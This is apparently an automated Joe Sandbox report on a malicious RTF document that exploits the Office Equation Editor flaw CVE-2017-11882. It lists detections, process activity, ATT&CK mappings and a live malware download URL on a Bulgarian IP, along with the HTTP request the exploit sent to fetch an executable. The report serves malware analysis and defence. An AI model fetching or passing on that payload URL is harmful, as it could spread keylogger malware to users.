Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
d1wn7m0x0FWFbfs.doc

Overview

General Information

Sample name:d1wn7m0x0FWFbfs.doc
Analysis ID:1568287
MD5:06aa157e613bb060f325420c82c2bb60
SHA1:69a3f3245067abb4a98729317e2446154cd6b4ea
SHA256:41b2982fe12fa16b38670cbcfb26d89ebd89572c03687433467556fa6f920ade
Tags:docuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Document exploit detected (process start blacklist hit)
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3408 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3504 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • EQNEDT32.EXE (PID: 3784 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
d1wn7m0x0FWFbfs.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x21610:$obj2: \objdata
  • 0x2162b:$obj3: \objupdate
  • 0x215ec:$obj4: \objemb

Exploits

barindex
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 87.120.84.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3504, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

System Summary

barindex
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3504, Protocol: tcp, SourceIp: 87.120.84.39, SourceIsIpv6: false, SourcePort: 80
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3504, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3408, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: d1wn7m0x0FWFbfs.docAvira: detected
Source: http://87.120.84.39/txt/d1wn7m0x0FWFbfs.exeAvira URL Cloud: Label: malware
Source: d1wn7m0x0FWFbfs.docReversingLabs: Detection: 50%

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 87.120.84.39 Port: 80Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
Source: Joe Sandbox ViewIP Address: 87.120.84.39 87.120.84.39
Source: Joe Sandbox ViewASN Name: SHARCOM-ASBG SHARCOM-ASBG
Source: global trafficHTTP traffic detected: GET /txt/d1wn7m0x0FWFbfs.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.39Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.39
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{66EDD512-7614-4ECB-AFE1-9123DE363340}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /txt/d1wn7m0x0FWFbfs.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.39Connection: Keep-Alive
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.435104690.000000000030F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/d1wn7m0x0FWFbfs.exe
Source: EQNEDT32.EXE, 00000002.00000002.435104690.000000000030F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/d1wn7m0x0FWFbfs.exe(
Source: EQNEDT32.EXE, 00000002.00000002.435104690.000000000030F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.39/txt/d1wn7m0x0FWFbfs.exej

System Summary

barindex
Source: initial sampleStatic file information: Filename: d1wn7m0x0FWFbfs.doc
Source: d1wn7m0x0FWFbfs.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003244F82_2_003244F8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00323F782_2_00323F78
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0031BFB62_2_0031BFB6
Source: d1wn7m0x0FWFbfs.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: classification engineClassification label: mal100.expl.winDOC@4/9@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$wn7m0x0FWFbfs.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB1C1.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: d1wn7m0x0FWFbfs.docReversingLabs: Detection: 50%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: d1wn7m0x0FWFbfs.LNK.0.drLNK file: ..\..\..\..\..\Desktop\d1wn7m0x0FWFbfs.doc
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00328093 push esp; ret 2_2_00328097
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0032809B push esp; ret 2_2_0032809F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0032808B push esp; ret 2_2_0032808F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0031C2DC pushad ; retn 0031h2_2_0031C2DD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00328318 push esp; ret 2_2_0032831B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00318F59 push eax; retf 2_2_00318F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0030F798 push es; ret 2_2_0030F799
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_003269E6 push esp; ret 2_2_003269E7
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3524Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3804Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts32
Exploitation for Client Execution
1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping1
Virtualization/Sandbox Evasion
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Remote System Discovery
Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS3
System Information Discovery
Distributed Component Object ModelInput Capture11
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
d1wn7m0x0FWFbfs.doc50%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
d1wn7m0x0FWFbfs.doc100%AviraHEUR/Rtf.Malformed
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://87.120.84.39/txt/d1wn7m0x0FWFbfs.exej0%Avira URL Cloudsafe
http://87.120.84.39/txt/d1wn7m0x0FWFbfs.exe100%Avira URL Cloudmalware
http://87.120.84.39/txt/d1wn7m0x0FWFbfs.exe(0%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://87.120.84.39/txt/d1wn7m0x0FWFbfs.exetrue
  • Avira URL Cloud: malware
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://87.120.84.39/txt/d1wn7m0x0FWFbfs.exe(EQNEDT32.EXE, 00000002.00000002.435104690.000000000030F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://87.120.84.39/txt/d1wn7m0x0FWFbfs.exejEQNEDT32.EXE, 00000002.00000002.435104690.000000000030F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
87.120.84.39
unknownBulgaria
51189SHARCOM-ASBGtrue
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1568287
Start date and time:2024-12-04 14:25:59 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:d1wn7m0x0FWFbfs.doc
Detection:MAL
Classification:mal100.expl.winDOC@4/9@0/1
EGA Information:Failed
HCA Information:Failed
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active ActiveX Object
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
  • Execution Graph export aborted for target EQNEDT32.EXE, PID 3504 because there are no executed function
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • VT rate limit hit for: d1wn7m0x0FWFbfs.doc
TimeTypeDescription
08:27:05API Interceptor477x Sleep call for process: EQNEDT32.EXE modified
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
87.120.84.39xi4HNTgb7wewrDQ.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39/txt/xi4HNTgb7wewrDQ.exe
zxdonmn.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39/txt/AGdxlHjL3XmrRJw.exe
NEW ORDER #233.xlam.xlsxGet hashmaliciousUnknownBrowse
  • 87.120.84.39/txt/x0C0Zc8JHYzAip.exe
Bank Copy.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39/txt/mydocfile.wbk
Bank Copy.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39/txt/mydocfile.wbk
dattizxmn.dot.rtfGet hashmaliciousUnknownBrowse
  • 87.120.84.39/txt/dattimnzx.vbs
SEPTEMBER Updated SOA 210827 Statement 457680001.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39/txt/dattizxmn.dot
SEPTEMBER Updated SOA 210827 Statement 457680001.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39/txt/dattizxmn.dot
Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
  • 87.120.84.39/txt/Xkl0PnD8zFPjfh1.exe
Bank Swift Copy 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
  • 87.120.84.39/txt/xXdquUOrM1vD3An.exe
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
SHARCOM-ASBGxi4HNTgb7wewrDQ.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39
zxdonmn.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39
NEW ORDER #233.xlam.xlsxGet hashmaliciousUnknownBrowse
  • 87.120.84.39
Bank Copy.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39
Bank Copy.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39
dattizxmn.dot.rtfGet hashmaliciousUnknownBrowse
  • 87.120.84.39
SEPTEMBER Updated SOA 210827 Statement 457680001.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39
SEPTEMBER Updated SOA 210827 Statement 457680001.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39
Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
  • 87.120.84.39
SOA.docx.docGet hashmaliciousUnknownBrowse
  • 87.120.84.39
No context
No context
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3::
MD5:CE338FE6899778AACFC28414F2D9498B
SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious:false
Reputation:high, very likely benign file
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1536
Entropy (8bit):1.3586208805849453
Encrypted:false
SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbN:IiiiiiiiiifdLloZQc8++lsJe1Mzq
MD5:C8CCA6FCF2E469042DDC7A416858DD2A
SHA1:EDE2B061BD5514416BA76CD42BFEFF6F49CF6F08
SHA-256:7BACAF1DC38F754A7D5AE23AD621A41A8639357BF3BA236A11FAEE7760177B4C
